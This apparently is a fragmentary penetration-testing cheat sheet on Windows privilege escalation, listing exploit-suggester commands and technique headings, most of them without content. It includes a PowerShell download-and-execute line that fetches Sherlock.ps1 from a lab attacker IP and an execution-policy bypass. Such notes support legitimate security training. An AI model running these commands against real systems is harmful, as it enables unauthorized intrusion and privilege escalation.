Privesc Openings
Windows Exploiter Suggester
# https://github.com/bitsadmin/wesng
# 1. Copy and paste into system.txt in kali
Systeminfo
# 2. Update windows exploit suggester. Will generate a .xls file
python windows-exploit-suggester.py --update
# 3. Start suggesting an exploit
python windows-exploit-suggester.py --database <generated xls> --systeminfo system.txt
Sherlock
Find All Vulns
# find-allvulns 1
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.32/Sherlock.ps1')
find-allvulns
# find-allvulns 2
powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; find-allvulns}"
PowerUp Invoke-AllChecks
Alternatively
DLL Hijacking (PowerUp)
Dump Process
Using Token and AutoLogon creds
AlwaysInstallElevated
ICALCS
WMIC
Unquoted Service Paths
To discover unquoted service path
Writable Path (accesschk.exe > upnphost)

Querying Service
Method 1: Adding backdoor user to admin group
Method 2: Adding binary payload
Services Registry

Last updated